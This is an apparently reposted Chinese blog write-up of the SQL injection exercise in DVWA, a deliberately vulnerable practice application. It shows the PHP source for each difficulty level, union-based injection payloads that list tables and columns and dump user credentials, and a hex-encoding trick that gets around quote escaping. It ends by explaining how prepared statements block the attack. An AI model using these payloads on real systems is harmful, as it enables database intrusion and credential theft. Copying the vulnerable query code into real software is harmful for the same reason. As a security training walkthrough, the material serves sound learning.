1. 程式人生 > 其它 >2020-12-06-DVWA之sql

2020-12-06-DVWA之sql


layout: post
title: DVWA之sql-injection
subtitle: 學習學習
date: 2020-12-06
author: lll-yz
header-img: img/post-bg-coffee.jpg
catalog: true
tags:

  • DVWA

SQL Injection

low
<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?> 

沒有對使用者輸入做任何限制。

1.首先嚐試注入型別,輸入 1’ ,提示

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

說明為字元型注入,’ 閉合。

2.輸入 1’ # ,回顯正確。這個是採用註釋掉後面 ‘ 的方式。

也可以 1’ or ‘1’='1 閉合後面單引號,同樣可以達到目的。

3.判斷欄位數,輸入 1’ order by x # (x=2,3) 得到欄位數為2。

4.查詢回顯欄位,輸入 -1’ union select 1,2 # ,得到回顯欄位

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-Tr2aNwJ7-1611492819137)(https://s3.ax1x.com/2020/12/07/DvNVYR.png)]

5.查詢資料庫名,輸入 -1’ union select 1,database() # ,

DvahFJ.png

得到資料庫為 dvwa。

6.-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) #

查詢表名:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-KxV1hWux-1611492819144)(https://s3.ax1x.com/2020/12/07/Dvwp4J.png)]

7.-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’) #

查詢列名:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-KlhZmirn-1611492819145)(https://s3.ax1x.com/2020/12/07/DvwsbT.md.png)]

8.-1’ union select 1,(select group_concat(user,’,’,password) from dvwa.users) #

得到使用者與密碼:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-salAH8Or-1611492819148)(https://s3.ax1x.com/2020/12/07/Dv0sSA.md.png)]

medium
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?> 

與low相比,增加了mysqli_real_escape_string函式對 特殊字元

  • \x00
  • \n
  • \r
  • \
  • "
  • \x1a

進行了轉義。且改為了下拉選單,防止在輸入框中直接注入。

我們可以在burp抓包:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-o9EAmcoT-1611492819150)(https://s3.ax1x.com/2020/12/08/rSAkyq.png)]

1.判斷注入型別。

報錯:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\''at line 1

得出位數值型注入。這下mysqli_real_escape_string函式對敏感字元進行的過濾顯得比較雞肋了,數值型注入id不需要用 ',"等進行閉合,直接注入即可。

2.判斷欄位數。

id=1 order by 2&Submit=Submit 回顯正常。

id=1 order by 3&Submit=Submit 錯誤,說明有2欄位。

3.判斷回顯。

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-i6u9fdyZ-1611492819153)(https://s3.ax1x.com/2020/12/08/rSEfUO.png)]

4.查詢資料庫。

id=-1 union select 1,database()&Submit=Submit

5.查詢表名。

id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())&Submit=Submit

6.查詢資料。

id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)&Submit=Submit

查詢失敗。 syntax to use near '\'users\')'at line 1 因為 ’ 被轉義了。

可以將users轉化為16進位制繞過。

id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)&Submit=Submit

成功。

7.查詢資料。

id=-1 union select 1,(select group_concat(user,password) from dvwa.users)&Submit=Submit

high
<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?> 

與medium相比,high級別多了一個limit 1,限制只輸出一個結果。但可以通過#將其註釋掉。

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片儲存下來直接上傳(img-NwRmMNxW-1611492819154)(https://s3.ax1x.com/2020/12/08/rSvkRK.png)]

後面多了一個#註釋。

步驟同low基本(查詢列名時table_name=‘users’ 這裡使用16進位制繞過一下)

impossible
<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

程式碼解讀:

user_token: 使用者token。

is_numeric(): 檢測變數是否為數字或數字字串。

prepare(): 準備要執行的SQL語句,並返回一個PDOStatement物件。

bindParam(): 繫結一個引數指定的變數名。

execute(): 方法返回物件。

}

}

// Generate Anti-CSRF token
generateSessionToken();

?>


程式碼解讀:

**user_token:** 使用者token。

**is_numeric():** 檢測變數是否為數字或數字字串。

**prepare():** 準備要執行的SQL語句,並返回一個PDOStatement物件。

**bindParam():** 繫結一個引數指定的變數名。

**execute():** 方法返回物件。

impossible級別程式碼採用了PDO技術,劃清了程式碼與資料的界限,有效防禦SQL注入,同時只有返回的查詢結果數量為一時,才會成功輸出,Anti-CSRF token機制的加入進一步提高了安全性。